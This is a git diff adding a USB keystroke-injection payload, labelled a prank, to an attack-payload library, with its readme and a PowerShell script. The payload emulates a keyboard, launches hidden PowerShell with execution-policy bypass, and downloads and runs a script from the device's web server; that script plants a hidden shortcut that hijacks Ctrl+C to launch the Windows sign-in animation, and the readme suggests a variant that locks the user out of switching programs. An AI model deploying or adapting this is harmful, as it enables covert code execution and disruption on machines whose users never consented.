diff --git a/payloads/library/prank/Win_PoSh_HiThere/payload.txt b/payloads/library/prank/Win_PoSh_HiThere/payload.txt new file mode 100644 index 00000000..06d8fb8f --- /dev/null +++ b/payloads/library/prank/Win_PoSh_HiThere/payload.txt @@ -0,0 +1,37 @@ +#!/bin/bash +# Title: Hi There +# Description: Creates a hidden link file that override the ctrl+c functionality. +# So, where the use press ctrl+c it lunches the first sign-in animation. +# Author: Cribbit +# Version: 1.0 +# Category: Pranks +# Target: Windows (Powershell 5.1+) +# Attackmodes: RNDIS_ETHERNET HID +# Props: v3ded, Hexacorn and Audibleblink (Python Server) + +LED SETUP +ATTACKMODE RNDIS_ETHERNET HID + +GET SWITCH_POSITION +GET HOST_IP + + +cd /root/udisk/payloads/$SWITCH_POSITION/ + +# starting server +LED SPECIAL + +# disallow outgoing dns requests so server starts immediately +iptables -A OUTPUT -p udp --dport 53 -j DROP +python -m SimpleHTTPServer 80 & + +# wait until port is listening +while ! nc -z localhost 80; do sleep 0.2; done + +# attack commences +LED ATTACK +QUACK DELAY 200 +RUN WIN "powershell -Noni -NoP -W h -EP Bypass -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\"" +QUACK DELAY 500 +QUACK CTRL c +LED FINISH \ No newline at end of file diff --git a/payloads/library/prank/Win_PoSh_HiThere/readme.md b/payloads/library/prank/Win_PoSh_HiThere/readme.md new file mode 100644 index 00000000..ea7f5a4c --- /dev/null +++ b/payloads/library/prank/Win_PoSh_HiThere/readme.md @@ -0,0 +1,33 @@ +# Hi There +- Author: Cribbit +- Version: 1.0 +- Tested on: Windows 10 (Powershell 5.1+) +- Category: Pranks +- Attackmode: HID & RNDIS_ETHERNET +- Extensions: Run +- Props: v3ded, Hexacorn and Audibleblink (Python Server) + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Description +Creates a hidden link file that override the ctrl+c functionality. +So, where the use press ctrl+c it lunches the first sign-in animation. + +## Notes +to kill the animation, you need to open task manger and look for "First Sign-in Animation". +For extra evilness add `/explorer` to the `$shortcut.Arguments` line in the script file. Then you can't switch programs or kill it. + +## More information + + + + +## Colours +| Status | Colour | Description | +| -------- | ----------------------------- | --------------------------- | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting Powershell script | +| FINISHED | Green blink followed by SOLID | Injection finished | \ No newline at end of file diff --git a/payloads/library/prank/Win_PoSh_HiThere/s b/payloads/library/prank/Win_PoSh_HiThere/s new file mode 100644 index 00000000..2641a532 --- /dev/null +++ b/payloads/library/prank/Win_PoSh_HiThere/s @@ -0,0 +1,19 @@ +$path = "$([Environment]::GetFolderPath('Desktop'))\readme.lnk" +$wshell = New-Object -ComObject Wscript.Shell +$shortcut = $wshell.CreateShortcut($path) + +$shortcut.IconLocation = "C:\Windows\System32\shell32.dll,70" + +$shortcut.TargetPath = "C:\Windows\System32\oobe\FirstLogonAnim.exe" +$shortcut.Arguments = "/RunFirstLogonAnim" +$shortcut.WorkingDirectory = "C:" +$shortcut.HotKey = "CTRL+C" +$shortcut.Description = "Contain very important information" + +$shortcut.WindowStyle = 7 + # 7 = Minimized window + # 3 = Maximized window + # 1 = Normal window +$shortcut.Save() + +(Get-Item $path).Attributes += 'Hidden' # Optional if we want to make the link invisible (prevent user clicks) \ No newline at end of file